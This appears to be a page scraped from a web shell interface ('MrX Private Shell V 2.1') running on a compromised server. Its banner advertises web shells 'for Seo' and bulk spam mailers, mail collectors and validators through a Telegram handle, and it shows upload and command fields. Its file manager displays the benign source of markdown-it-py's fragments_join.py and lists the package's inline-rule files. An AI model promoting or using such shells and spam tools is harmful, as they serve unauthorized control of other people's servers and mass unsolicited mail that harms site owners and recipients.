__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

[email protected]: ~ $
from .state_inline import StateInline


def fragments_join(state: StateInline) -> None:
    """
    Clean up tokens after emphasis and strikethrough postprocessing:
    merge adjacent text nodes into one and re-calculate all token levels

    This is necessary because initially emphasis delimiter markers (``*, _, ~``)
    are treated as their own separate text tokens. Then emphasis rule either
    leaves them as text (needed to merge with adjacent text) or turns them
    into opening/closing tags (which messes up levels inside).
    """
    level = 0
    maximum = len(state.tokens)

    curr = last = 0
    while curr < maximum:
        # re-calculate levels after emphasis/strikethrough turns some text nodes
        # into opening/closing tags
        if state.tokens[curr].nesting < 0:
            level -= 1  # closing tag
        state.tokens[curr].level = level
        if state.tokens[curr].nesting > 0:
            level += 1  # opening tag

        if (
            state.tokens[curr].type == "text"
            and curr + 1 < maximum
            and state.tokens[curr + 1].type == "text"
        ):
            # collapse two adjacent text nodes
            state.tokens[curr + 1].content = (
                state.tokens[curr].content + state.tokens[curr + 1].content
            )
        else:
            if curr != last:
                state.tokens[last] = state.tokens[curr]
            last += 1
        curr += 1

    if curr != last:
        del state.tokens[last:]

Filemanager

Name Type Size Permission Actions
__pycache__ Folder 0755
__init__.py File 696 B 0644
autolink.py File 2.03 KB 0644
backticks.py File 1.99 KB 0644
balance_pairs.py File 4.74 KB 0644
emphasis.py File 3.05 KB 0644
entity.py File 1.61 KB 0644
escape.py File 1.62 KB 0644
fragments_join.py File 1.46 KB 0644
html_inline.py File 1.1 KB 0644
image.py File 4.04 KB 0644
link.py File 4.22 KB 0644
linkify.py File 1.66 KB 0644
newline.py File 1.27 KB 0644
state_inline.py File 4.98 KB 0644
strikethrough.py File 3.14 KB 0644
text.py File 901 B 0644
Filemanager